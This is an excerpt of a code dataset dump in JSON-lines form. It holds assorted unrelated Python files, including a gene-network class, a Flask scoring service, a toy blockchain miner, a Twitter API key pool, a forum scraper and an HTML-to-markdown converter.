\"+list[i+1]+\"\\t\"+\"loop\"+\"\\n\")\n def getNodes(self):\n return self.network.keys()\n\n def printNodesToFile(self,fname,type):\n fout = file(fname,\"w\")\n for n in self.getNodes():\n node = self.getNode(n)\n if type==\"all\" or type==node.nodeType:\n fout.write(node.geneID+\"\\n\")\n fout.close()\n\n def getNode(self,n):\n return self.network[n]\n\n ## helper method to add node to the network from edge list element\n def createNode(self,element):\n source = element[0]\n target = element[1]\n\n if source not in self.network:\n self.network[source] = GeneNode(source)\n\n if target not in self.network:\n self.network[target] = GeneNode(target)\n\n self.network[source].addOutWardNode(target)\n self.network[target].addInWardNode(source)\n\n def getEndNodesOfNetwork(self):\n endNodeSet = set()\n for node in self.network:\n if self.network[node].isEndNode():\n endNodeSet.add(node)\n return endNodeSet\n\n def getStartNodesOfNetwork(self):\n startNodeSet = set()\n for node in self.network:\n if self.network[node].isStartNode():\n startNodeSet.add(node)\n return startNodeSet\n\n ##recursive method that is called for longest chain calculation\n def calculateLongestChain(self,node,level,visited):\n\n if self.network[node].isEndNode() or node in visited:\n return level+1\n\n visited.add(node)\n maxVal = -999\n for n in self.network[node].getOutWardNode():\n result = self.calculateLongestChain(n,level+1,visited)\n if result>maxVal:\n maxVal = result\n\n return maxVal\n\n ## calculate longest chain from every starting nodes in the network\n def longestNodesChain(self):\n startNodes = self.getStartNodesOfNetwork()\n output = {}\n for n in startNodes:\n visited = set()\n level = self.calculateLongestChain(n,0,visited)\n output[n] = level\n\n return output\n\n ##print network into edge list file, you can skip node if you want to exclude some node\n def printNetworkTofile(self,skipNode,fName):\n fName.write(\"Source\\tTarget\\tType\\n\")\n toPrint = set()\n for n in self.network:\n self.network[n].printEdgeRel(toPrint)\n\n for n in toPrint:\n split = n.split(\"\\t\")\n if split[0] in skipNode or split[1] in skipNode:\n continue\n fName.write(n)\n\n @staticmethod ## load node value from inputted file\n def loadNodeValue(fname):\n nodeValue = {}\n for line in fname:\n if \"Gene\" in line:\n continue\n\n array = line.split(\"\\t\")\n\n nodeValue[array[0]] = array[1]\n\n return nodeValue\n\n ## set node value and store it in the score attribute\n def setNodeValue(self,valueList):\n for n in self.network:\n if n in valueList:\n self.network[n].score = float(valueList[n])\n else:\n self.network[n].score = float(0)\n\n def removeNode(self,node): ##remove node from the network\n for n in self.network[node].getInWardNode():\n self.network[n].removeOutWardNode(node)\n\n for n in self.network[node].getOutWardNode():\n self.network[n].removeInWardNode(node)\n\n self.network.pop(node)\n\n ##remove edge that connect exactly same source and target\n def removeSamePath(self):\n for n in self.network:\n if self.network[n].nodeType==\"protein\":\n continue\n\n connectedNodes = set()\n outWardEdge = self.network[n].getOutWardNode()\n\n for edge in outWardEdge:\n\n if len(self.network[edge].getInWardNode())>1:\n continue\n\n edge_outward = set(self.network[edge].getOutWardNode())\n intersect = connectedNodes.intersection(edge_outward)\n for i in intersect:\n self.network[edge].removeOutWardNode(i)\n self.network[i].removeInWardNode(edge)\n connectedNodes = connectedNodes.union(edge_outward)\n\n ##remove protein nodes that are in the starting node or end node\n def filterProteinNode(self):\n start = self.getStartNodesOfNetwork()\n for n in start:\n if self.network[n].nodeType==\"protein\":\n self.removeNode(n)\n\n end = self.getEndNodesOfNetwork()\n for n in end:\n if self.network[n].nodeType==\"protein\":\n self.removeNode(n)\n\n ##remove short sub network that is isolated, remove protein node is start/end pos, remove same path\n def filterNetwork(self):\n output = self.longestNodesChain()\n while 1 in output.values() or 2 in output.values() or 3 in output.values():\n for n in output:\n if output[n]<=3:\n self.removeNode(n)\n self.filterProteinNode()\n output = self.longestNodesChain()\n\n self.removeSamePath()\n\n def calculateDepth(self,node,score,visited):\n if self.network[node].score child.value\n for child in self.traverse_inorder(node.right):\n assert node.value < child.value\n\n\n","sub_path":"Trees/py/test_bst.py","file_name":"test_bst.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"418962268","text":"import cv2\nimport numpy as np\nimport os\n\ndef resize(img):\n return cv2.resize(img, (128, 128))\n\ndef prep_data(frame_folder):\n if not os.path.exists('batches'):\n os.mkdir('batches')\n datafolder = 'data/'+frame_folder+'/'\n frames = os.listdir(datafolder)\n frames.sort(key = lambda x: int(x[:-4]))\n\n img_shape = (1,1,128,128)\n feats_shape = (1,2,128,128)\n feats = np.empty(feats_shape)\n targets = np.empty(img_shape)\n\n num_frames = len(frames)\n batch_size = 256\n batches = num_frames // batch_size\n dist = 8 # distance between two frames to predict\n print('Starting to load frames and save as batches of {} numpy arrays'.format(batch_size))\n for batch in range(batches):\n for n in range(batch_size - dist):\n frame_start = datafolder + frames[batch*batch_size + n]\n frame_end = datafolder + frames[batch*batch_size + n+dist]\n img_start = resize(cv2.imread(frame_start, cv2.IMREAD_GRAYSCALE)).reshape(img_shape)\n img_end = resize(cv2.imread(frame_end, cv2.IMREAD_GRAYSCALE)).reshape(img_shape)\n duo = np.hstack((img_start,img_end))\n feats = np.vstack((feats, duo))\n\n frame_mid = datafolder + frames[batch*batch_size + n + int(dist/2)]\n img_mid = resize(cv2.imread(frame_mid, cv2.IMREAD_GRAYSCALE)).reshape(img_shape)\n targets = np.vstack((targets, img_mid))\n\n feats = np.delete(feats, 0, 0)\n targets = np.delete(targets, 0, 0)\n\n np.save('batches/batch{}_feats'.format(batch), feats.astype(int))\n np.save('batches/batch{}_targets'.format(batch), targets.astype(int))\n print('Done saving batch {} of {}'.format(batch+1, batches))\n\nif __name__ == \"__main__\":\n prep_data('test_video')\n","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"518550501","text":"print(\"Program to convert a decimal number to its binary equivalent\")\nnum = int(input(\"Enter a number: \"))\nwhile num > 0:\n num = int(input(\"Enter a non-negative number: \"))\n if num == 0:\n bin = \"0\"\n else:\n bin = \"\"\n working = num\n while working != 0:\n if working % 2 != 1:\n bin = \"1\" + bin\n else:\n bin = \"1\" + bin\n print(bin)\n working = working // 2\n print(bin)\n num = num - 1\n","sub_path":"Codevita/binary_equ.py","file_name":"binary_equ.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"605216002","text":"#!/usr/bin/python3\n\nimport psycopg2\nimport cv2\nimport requests\nimport numpy as np\nimport time\nfrom datetime import datetime\nimport json\n\npause = 30\n\nmikkas = ['vr', 'pizza_sh_sp', 'floor_r_sh_hd', 'floor_d_sh_sp', 'bed_lh_yk', 'bed_sh_sp', 'wine_sh_sp', 'pc']\nmikkas = [[m, cv2.imread(m + '.png')] for m in mikkas]\n\ndef get_image(ipfs_hash):\n print(' Getting', ipfs_hash)\n res = requests.get('https://infura-ipfs.io/ipfs/' + ipfs_hash)\n if res.status_code == 200:\n print(' done')\n return res.content\n else:\n time.sleep(1)\n return get_image(ipfs_hash)\n\nwhile True:\n start = datetime.now()\n\n conn = psycopg2.connect(dbname='cardanocity', port=5432)\n cur = conn.cursor()\n cur.execute('select * from units where mikka is null')\n units = cur.fetchall()\n units = [unit[1] for unit in units]\n found = len(units)\n print('\\n Found:', found)\n\n if found == 0:\n print(' Pausing for', pause)\n time.sleep(pause)\n else:\n n = 1\n positions = []\n for unit in units:\n print('\\n', n, 'of', found, '- Getting image for', unit['name'])\n img = get_image(unit['image'][7:])\n img = cv2.imdecode(np.frombuffer(img, np.uint8), 1)\n vals = []\n for mikka in mikkas:\n try:\n r = cv2.matchTemplate(mikka[1], img, cv2.TM_SQDIFF_NORMED)\n min_val,_,_,_ = cv2.minMaxLoc(r)\n except:\n min_val = 1\n vals.append([mikka[0], min_val])\n if min_val < 0.08:\n break\n vals = sorted(vals, key=lambda k: k[1])\n positions.append([unit['name'], mikka[0]])\n print(positions[-1:])\n n += 1\n for p in positions:\n p[1] = {'position': p[1]}\n print(p)\n cur.execute('insert into units(name,mikka) values(\\'' + p[0] + '\\',\\'' + json.dumps(p[1]).replace(\"\\'\", \"\\'\\'\") + '\\') on conflict (name) do update set mikka=excluded.mikka')\n conn.commit()\n\n cur.close()\n conn.close()\n print(' Finished in', datetime.now() - start)\n","sub_path":"get_positions.py","file_name":"get_positions.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"138992913","text":"# Lists\nbirthdays = {'Terrance': 'Apr 14', 'Dad': 'Sep 5', 'Sister': 'May 27'}\n\n\ndef main():\n while True:\n print('Enter a name: (blank to quit)')\n name = input()\n if name == '':\n break\n if name in birthdays:\n print(birthdays[name] + ' is the birthday of ' + name)\n else:\n print('I do not have birthday information for ' + name)\n print('What is their birthday?')\n b_day = input()\n birthdays[name] = b_day # Sets given name as new key and assigns given date as value.\n print('Birthday database updated')\n\n\nmain()\n","sub_path":"Examples/chapter_ 5_birthdays.py","file_name":"chapter_ 5_birthdays.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111538753","text":"# coding:utf-8\nfrom block import Block\nfrom account import get_account\nfrom database import BlockChainDB\nfrom lib.common import unlock_sig, lock_sig\n\nMAX_COIN = 21000000\nREWARD = 20\n\ndef coinbase():\n \"\"\"\n First block generate. \n cb = block_height, version, merkle_root, target(setting difficulity), hash\n \"\"\"\n cb = Block(0, \"00000001\", \"0000000000000000000000000000000000000000000000000000000000000000\", \"0001000000000000000000000000000000000000000000000000000000000000\",\"\")\n nouce = cb.pow()\n cb.make(nouce)\n # Save block and transactions to database.\n\n BlockChainDB().insert(cb.to_dict())\n return cb\n\ndef mine():\n \"\"\"\n Main miner method.\n \"\"\"\n # Found last block and unchecked transactions.\n last_block = BlockChainDB().last()\n\n if len(last_block) == 0:\n last_block = coinbase().to_dict()\n\n # Miner reward is the first transaction.\n cb = Block( last_block['block_height'] + 1, last_block['version'], last_block['merkle_root'], last_block['target'], last_block['hash'])\n nouce = cb.pow()\n cb.make(nouce)\n # Save block and transactions to database.\n BlockChainDB().insert(cb.to_dict())\n # Broadcast to other nodes\n Block.spread(cb.to_dict())\n return cb","sub_path":"miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"639079546","text":"from heapq import heappush, heappop, heapify\nimport tweepy\nimport json\n\nKEY_FILE = \"keys.json\"\n\n\nclass API:\n\n def __init__(self, key):\n auth = tweepy.OAuthHandler(key[\"app_key\"], key[\"app_sec\"])\n auth.set_access_token(key[\"user_key\"], key[\"user_sec\"])\n self.api = tweepy.API(auth, retry_count = 3, retry_delay = 10, timeout=10, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n self.name = key[\"name\"]\n\n\nclass TwitterAPIPool:\n\n def __init__(self, category, sub_category):\n self.app_creds = []\n self.category = category\n self.sub_category = sub_category\n with open(KEY_FILE, 'r') as key_file:\n keys = json.load(key_file)\n for i, key in enumerate(keys['keys']):\n app = API(key)\n self.add_app_key(i, app)\n\n def add_app_key(self, pos, app):\n rate_limit_status = app.api.rate_limit_status(\n )['resources'][self.category][self.sub_category]\n priority_remaining_requests = -1 * rate_limit_status['remaining']\n priority_reset_time = rate_limit_status['reset']\n #print(app.name, pos, priority_remaining_requests, priority_reset_time)\n heappush(self.app_creds, (priority_remaining_requests,\n priority_reset_time, pos, app))\n\n def get_api(self):\n heapify(self.app_creds)\n app_min_wait_ = heappop(self.app_creds)\n pos = app_min_wait_[2]\n app = app_min_wait_[3]\n self.add_app_key(pos, app)\n return app.api\n\n def __len__(self):\n return len(self.app_creds)\n\n def __iter__(self):\n return self\n\n def next(self):\n try:\n return self.get_api()\n except IndexError:\n raise StopIteration\n","sub_path":"exploratory_analysis/.ipynb_checkpoints/TwitterAPIManager-checkpoint.py","file_name":"TwitterAPIManager-checkpoint.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"254652005","text":"import sys\nsys.path.insert(0,'/ebay/hermes/PETitles')\nfrom datetime import datetime\nfrom flask import Flask, request, Response\nfrom flask_json import json_response\nfrom model.ProductTitlesScoreServiceResponse import ProductTitlesScoreServiceResponse\nfrom titlescorer.scripts.PETitleScorerApi import PETitleScorer\nfrom functions.ServiceRequestToPythonObject import convert as ServiceRequstToBO\nimport json\n\napp = Flask(__name__)\napp.config['JSON_ADD_STATUS'] = False\ntemplate = \"An exception of type {0} occured. Arguments:\\n{1!r}\"\n\n\n@app.route('/get_time')\ndef get_time():\n now = datetime.utcnow()\n return json_response(time=now)\n\n@app.route('/hello', methods=['GET'])\ndef hello():\n hello = \"hello\"\n return hello\n\n@app.route('/getTitleScore', methods=['POST'])\ndef handleTitleScoreRequest():\n try:\n peTitlesScorerResponse = []\n jsonRequest = json.loads(request.data)\n productTitlesScoreServiceRequest = ServiceRequstToBO(jsonRequest)\n for response in peTitleScorer.calculate_score(productTitlesScoreServiceRequest.productTitlesScoreRequest):\n peTitlesScorerResponse.append(response)\n productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(productTitlesScoreServiceRequest.invocationId, peTitlesScorerResponse, \"200\"), 200)\n except ValueError as ex:\n message = template.format(type(ex).__name__, ex.args)\n productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(None, None, 400, message), 400)\n except KeyError as ex:\n message = template.format(type(ex).__name__, ex.args)\n productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(jsonRequest['invocationId'], None, 404, message), 404)\n except Exception as ex:\n message = template.format(type(ex).__name__, ex.args)\n productTitlesScoreServiceResponse = createServiceResponse(ProductTitlesScoreServiceResponse(None, None, 500, \"Internal System Error\"), 500)\n \n return productTitlesScoreServiceResponse\n\n\ndef createServiceResponse(productTitlesScoreServiceResponse, status_code):\n json_response = json.dumps(productTitlesScoreServiceResponse, default=lambda o: o.__dict__, sort_keys=True, indent=4)\n response = Response(json_response, content_type='application/json; charset=utf-8')\n response.headers.add('content-length', len(json_response))\n response.status_code = status_code\n return response;\n\n\nif __name__ == \"__main__\":\n adj_fname = \"/ebay/hermes/PETitles/data/adj.txt\"\n model_fname = \"/ebay/hermes/PETitles/data/model\"\n true_case = \"/ebay/hermes/PETitles/data/true_case.txt\"\n peTitleScorer = PETitleScorer(model_fname, adj_fname, true_case)\n app.run(host='0.0.0.0', port=8000, threaded=True)\n","sub_path":"TitleScoreService.py","file_name":"TitleScoreService.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"467698207","text":"'''\n@Author : sean cheng\n@Email : aya234@163.com\n@CreateTime : 2018/11/3\n@Program : 数独游戏的主入口\n'''\nimport pygame\nfrom pygame import *\nfrom sudoku.SetVar import SetVar\nfrom sudoku.game_draw import draw_gameArray, draw_background, draw_seletced, setting\n\n\ndef main():\n global gameArray, selectedArray\n setting = SetVar()\n\n pygame.init()\n screen = pygame.display.set_mode((setting.SCREEN_WIDTH, setting.SCREEN_HEIGHT))\n pygame.display.set_caption('数独游戏 —— 基于PyGame的实现 version 0.12')\n\n gameArray = setting.game_data_load()\n selectedArray = setting.selectedArray\n # print(gameArray)\n\n while True:\n # 关闭游戏\n setting.terminal_window()\n draw_background(screen)\n draw_gameArray(screen, gameArray)\n draw_seletced(screen)\n\n pygame.time.Clock().tick(30)\n pygame.display.update()\n\n\nif __name__ == '__main__':\n main()","sub_path":"sudoku/Sudoku.py","file_name":"Sudoku.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"139000100","text":"import os\n\nimport time\n\nfrom std.std import merge\n\n\ndef replace_strings(bundle, new_bundle):\n # Begin function work\n count_total = 0\n total_replace = 0\n count_error = 0\n\n for path, dirs, files in os.walk(\"/Users/andrew/PycharmProjects/python-build-script/test/android/assets\", True):\n for cur_name in files:\n print(files)\n count_total += 1\n file_path = merge(path, cur_name)\n try:\n text = open(file_path).read()\n if bundle in text:\n open(file_path, 'w').write(text.replace(bundle, new_bundle))\n total_replace += 1\n\n except ValueError:\n count_error += 1","sub_path":"test/android/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"264354826","text":"from flare.gp import GaussianProcess\nfrom flare.struc import Structure\nfrom flare.env import AtomicEnvironment\nimport numpy as np\nimport time\nimport datetime\n\nfrom flare import md\nfrom flare.output import Output\nimport flare.predict as predict\n\nclass MD:\n \"\"\"Generates NVE dynamics from a GP model.\"\"\"\n\n def __init__(self, dt: float, number_of_steps: int, gp: GaussianProcess,\n pos_init: np.ndarray, species, cell, masses,\n prev_pos_init: np.ndarray=None, par: bool=False, skip: int=0,\n output_name='otf_run.out'):\n\n self.dt = dt\n self.Nsteps = number_of_steps\n self.gp = gp\n\n self.structure = Structure(cell=cell, species=species,\n positions=pos_init,\n mass_dict=masses,\n prev_positions=prev_pos_init)\n\n self.noa = self.structure.positions.shape[0]\n self.atom_list = list(range(self.noa))\n self.curr_step = 0\n\n # choose prediction function\n if par is True:\n self.pred_func = predict.predict_on_structure_par_en\n else:\n self.pred_func = predict.predict_on_structure_en\n\n # initialize local energies\n self.local_energies = np.zeros(self.noa)\n\n self.pes = []\n self.kes = []\n\n self.output = Output(output_name)\n\n def run(self):\n self.output.write_header(self.gp.cutoffs, self.gp.kernel_name, self.gp.hyps,\n self.gp.algo, self.dt, self.Nsteps, self.structure)\n self.start_time = time.time()\n\n while self.curr_step < self.Nsteps:\n # verlet algorithm follows Frenkel p. 70\n self.gp.check_L_alpha()\n self.pred_func()\n new_pos = md.update_positions(self.dt, self.noa, self.structure)\n self.update_temperature(new_pos)\n self.record_state()\n self.update_positions(new_pos)\n self.curr_step += 1\n\n self.output.conclude_run()\n\n def update_positions(self, new_pos):\n self.structure.prev_positions = self.structure.positions\n self.structure.positions = new_pos\n self.structure.wrap_positions()\n\n def update_temperature(self, new_pos):\n KE, temperature = \\\n md.calculate_temperature(new_pos, self.structure, self.dt,\n self.noa)\n self.KE = KE\n self.temperature = temperature\n\n def record_state(self):\n self.pes.append(np.sum(self.local_energies))\n self.kes.append(self.KE)\n self.output.write_md_config(self.dt, self.curr_step, self.structure,\n self.temperature, self.KE, self.local_energies,\n self.start_time)\n self.output.write_xyz_config(self.curr_step, self.structure,\n self.dft_step)\n","sub_path":"flare/md_run.py","file_name":"md_run.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"334926998","text":"import datetime\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\ncsvoutput=open(\"csvEcnJapanese.csv\", \"w+\", encoding=\"UTF-8\")\noutput=open(\"ecnJapanese.txt\", \"w+\", encoding=\"UTF-8\")\n\ndef getEcnstats(threadId):\n html=urlopen(\"https://community.emc.com/thread/\"+str(threadId))\n bsObj=BeautifulSoup(html)\n title=bsObj.title.get_text()\n title=title.strip(\"EMC Community Network - DECN\")\n title=title.strip(\": \")\n questioner=bsObj.find(\"a\", {\"class\":\"jiveTT-hover-user jive-username-link\"})\n questioner=questioner.get_text()\n qpostedtime=bsObj.find(\"span\", {\"class\":\"j-post-author\"})\n qpostedtime=qpostedtime.get_text()\n textlist=qpostedtime.split(\" \")\n posttime=datetime.datetime.strptime(textlist[4], '%H:%M')\n \n summertime=0\n hour = posttime.hour+summertime\n minute = posttime.minute\n\n print(title+\"\\n\")\n output.write(title+\"\\n\")\n csvoutput.write(str(threadId)+\",\"+ title+\",\"+questioner+\",\"+str(hour)+\":\"+str(minute)+\"\\n\")\n\ndef getThreadtext(threadId):\n html=urlopen(\"https://community.emc.com/thread/\"+str(threadId))\n bsObj=BeautifulSoup(html)\n bodylist=bsObj.findAll(\"div\", {\"class\":\"jive-rendered-content\"})\n for body in bodylist: \n print(body.get_text()+\"\\n\")\n output.write(body.get_text()+\"\\n\")\n\n\nstartId=input(\"Enter the first thread# which in the Japanese forum site: \")\nendId=input(\"Enter the last thread# which in the Japaneese forum site: \")\nendId=int(endId)+1\n\nfor i in range(int(startId), int(endId)):\n try:\n htmltemp=urlopen(\"https://community.emc.com/thread/\"+str(i))\n except:\n print(\"Thread#\"+str(i)+\" has been deleted or is an invalid or private thread.\")\n else:\n bsObjTemp=BeautifulSoup(htmltemp)\n templist=bsObjTemp.findAll(\"script\", {\"type\":\"text/javascript\"})\n templist=str(templist)\n if \"communityID = '2814';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3093';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3094';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3095';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n elif \"communityID = '3096';\" in templist:\n getEcnstats(i)\n getThreadtext(i)\n\ncsvoutput.close()\noutput.close()\n\n\n","sub_path":"test_ecnJapanesetext4stats.py","file_name":"test_ecnJapanesetext4stats.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"110717249","text":"from sys import stdin\nimport time\n\n\ndef pascal(n):\n if n == 1:\n return [1]\n else:\n line = [1]\n linea_ant = pascal(n-1)\n for i in range(len(linea_ant)-1):\n line.append(linea_ant[i] + linea_ant[i+1])\n line += [1]\n print(*linea_ant)\n return line\n\n\ndef main():\n stard=time.time()\n n=int(stdin.readline().strip())\n print(*pascal(n))\n end=time.time()\n p=end-stard\n print(p/1000)\nmain()\n","sub_path":"laboratorios/lab3/D -Pascal triangle.py","file_name":"D -Pascal triangle.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510328049","text":"\"\"\"\nParameters for GridSearchCV\n\nModels:\n- Support Vector Regressor (SVR)\n- Gradient Boosting Tree Regressor (GBRT)\n- Random Forest Rregressor (RFR)\n\"\"\"\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# #Support Vector Regressor (SVR)\nsvr_param_grid = {'kernel': ['linear', 'poly', 'rbf'], \n\t\t\t\t 'degree': [2, 3], \n\t\t\t\t 'C': [5, 4, 3, 2, 1],\n\t\t\t\t 'gamma': [0.01, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 1], \n\t\t\t\t 'coef0': [0.0, 0.5, 0.7, 1, 5, 10] }\n\n# #Gradient Boosting Tree Regressor (GBTR)\ngbrt_param_grid = {'n_estimators': list(range(10, 500, 10)),\n\t\t\t\t 'loss': ['ls', 'huber'],\n\t\t\t\t 'learning_rate': [0.01, 0.05, 0.1, 0.25, 0.5], \n\t\t\t\t 'max_features': ['sqrt'],\n\t\t\t\t 'max_depth':[5, 4, 3, 2, 1], \n\t\t\t\t 'min_samples_split':[3, 2]} \n\n# #Random Forest Rregressor (RFR)\nrfr_param_grid = {'n_estimators': list(range(10, 500, 10)), \n\t\t\t\t 'criterion': ['mse'], \n\t\t\t\t 'max_depth': [None], \n\t\t\t\t 'min_samples_split': [2, 4], \n\t\t\t\t 'min_samples_leaf': [2, 5, 10], \n\t\t\t\t 'max_features': ['auto'], \n\t\t\t\t 'bootstrap': [True], \n\t\t\t\t 'oob_score': [False]}\n\n\n\n\n\n\n\n\n\n","sub_path":"Final Project/JJ_Machine_Learning/code/model_parameters.py","file_name":"model_parameters.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"363158682","text":"import numpy as np\nfrom plyfile import (PlyData, PlyElement, make2d, PlyParseError, PlyProperty)\n\ndef camera_depth_to_plane_depth(depth, f):\n\n h_ = depth.shape[0]\n w_ = depth.shape[1]\n\n i_c_ = np.float(h_) / 2 - 1\n j_c_ = np.float(w_) / 2 - 1\n\n cols_, rows_ = np.meshgrid(np.linspace(0, w_ - 1, num = w_), np.linspace(0, h_ - 1, num = h_))\n dist_from_center_ = ((rows_ - i_c_)**2 + (cols_ - j_c_)**2)**(0.5)\n plane_depth_ = depth / ((1 + dist_from_center_ / f)**2)**(0.5)\n\n return plane_depth_\n\ndef rgbd_to_rgb_cloud(depth, color, cx, cy, fx, fy):\n\n points_ = []\n colors_ = []\n\n for i in range(0, depth.shape[1]-1):\n for j in range(0, depth.shape[0]-1):\n\n z_ = depth[j][i] / 1000.0\n x_ = (i - cx) * (z_ / fx)\n y_ = (j - cy) * (z_ / fy)\n \n r_ = color[j][i][0]\n g_ = color[j][i][1]\n b_ = color[j][i][2]\n\n points_.append([x_, y_, z_])\n colors_.append([r_, g_, b_])\n\n return np.array(points_), np.array(colors_)\n\ndef save_ply_cloud(points, colors, filename):\n\n vertex = np.zeros(points.shape[0], dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')])\n\n for i in range(points.shape[0]):\n vertex[i] = (points[i][0], points[i][1], points[i][2], colors[i][0], colors[i][1], colors[i][2])\n \n ply_out = PlyData([PlyElement.describe(vertex, 'vertex', comments=['vertices'])])\n ply_out.write(filename)\n\ndef generate_cloud(depth, color, camera, outFilename):\n plane_depth_ = camera_depth_to_plane_depth(depth, camera.fx)\n points_, colors_ = rgbd_to_rgb_cloud(plane_depth_, color, camera.cx, camera.cy, camera.fx, camera.fy)\n save_ply_cloud(points_, colors_, outFilename)\n","sub_path":"generator/gnt_cloud.py","file_name":"gnt_cloud.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"136021081","text":"#!/usr/bin/python\nimport html2text\nfrom bs4 import BeautifulSoup\nimport posixpath\nimport os\nfrom os import remove\nfrom os import listdir\nfrom os.path import isfile, join, isdir, relpath\nimport shutil\nimport queue\n\n\n# TODO:\n# - [x]Read in whole file\n# - [x]Convert whole file to markdown\n# - [x]Write to a new file\n# - [x]read in line by line until ##\n# - [x]copy the rest of file into new samename markdown file\n# - [x] fix document links\n# - [x] create a directory with the filename\n# - [x] store images used in the directory\n# - [] keep relative path for links\n\n# helper function that checks if a link is valid\nimages = {}\nrootpath = \"~/\"\nq = queue.Queue()\nmypath = os.getcwd()\nstring = mypath.split('\\\\')\nmypath = \"/\".join(string)\nfiledict = {\n \"AP-OVERVIEW.htm\": \"AP-OVERVIEW\",\n \"AP-OVERVIEW.htm\": \"AP-OVERVIEW\",\n \"AR-OVERVIEW.htm\": \"AR-OVERVIEW\",\n \"DOC-OVERVIEW.htm\": \"DOC-OVERVIEW\",\n \"ENG-OVERVIEW.htm\": \"ENG-OVERVIEW\",\n \"EXEC-OVERVIEW.htm\": \"EXEC-OVERVIEW\",\n \"FS-OVERVIEW.htm\": \"FS-OVERVIEW\",\n \"GL-OVERVIEW.htm\": \"GL-OVERVIEW\",\n \"INV-OVERVIEW.htm\": \"INV-OVERVIEW\",\n \"MFG-OVERVIEW.htm\": \"MFG-OVERVIEW\",\n \"MRK-OVERVIEW.htm\": \"MRK-OVERVIEW\",\n \"PRO-OVERVIEW.htm\": \"PRO-OVERVIEW\",\n \"PUR-OVERVIEW.htm\": \"PUR-OVERVIEW\",\n \"ACE-OVERVIEW.htm\": \"ACE-OVERVIEW\"\n}\nlinkset = {}\nfor key in filedict:\n filedict[key] = mypath + '/' + filedict[key]\n\nvisited = set()\n\n\ndef valid_link(link):\n return isfile(link)\n\n# helper funciton that decomposes prev and next links\n\n\ndef sanitize_links(soup):\n for item in soup.find_all('a'):\n title = item.string\n if title == \"Previous\" or title == \"Next\":\n item.decompose()\n\n# Helper function that gets specified link from soup and decomposes if link is not valid\n\n\ndef move_images(images, path):\n if(len(images) > 0):\n for image in images:\n shutil.copy(image, path)\n\n\ndef get_images(soup):\n images = []\n for image in soup.find_all('img'):\n imagepath = image.get('src')\n if valid_link(imagepath):\n imagename = imagepath[7:len(imagepath)]\n image['src'] = \"./\" + imagename\n images.append(imagepath)\n return images\n\n\ndef get_relative(root, storedpath):\n string = storedpath.split('site/')[1]\n return root + string\n\n# This function returns a string that points to the site/ folder\n\n\ndef get_root_string(height):\n str = \"\"\n for i in range(0, height):\n str += '../'\n return str\n\n\ndef get_height(path):\n tokens = path.split('/')\n tokens.reverse()\n height = 0\n for token in tokens:\n if token != 'site':\n height += 1\n else:\n break\n return height\n\n\ndef get_links(parentfolder, soup):\n links = []\n for atag in soup.find_all('a'):\n href = atag['href']\n childfolder = href.split(\".\")[0]\n if href in visited:\n storedpath = filedict[href]\n height = get_height(filedict[parentfolder])\n root = get_root_string(height)\n relativepath = get_relative(root, storedpath)\n atag['href'] = relativepath\n # relative = relpath(storedpath, join(\n # filedict[parentfolder], childfolder))\n #atag['href'] = relative\n elif valid_link(href):\n currpath = filedict[parentfolder] + '/' + childfolder\n filedict[href] = currpath\n atag['href'] = get_prepend_diff(\n currpath, parentfolder) + \"/README.md\"\n links.append(href)\n else:\n atag.decompose\n return links\n\n\ndef get_prepend_diff(currpath, parentfolder):\n tokens = currpath.split('/')\n parent = parentfolder.split('.')[0]\n toconcat = False\n path = []\n for str in tokens:\n if toconcat:\n path.append(str)\n if str == parent:\n toconcat = True\n\n return '/'.join(path)\n\n\n# Helper function to create directory\n\ndef create_dir(path):\n if not isdir(path):\n os.mkdir(path)\n\n# Helper funciton to create README file\n\n\ndef 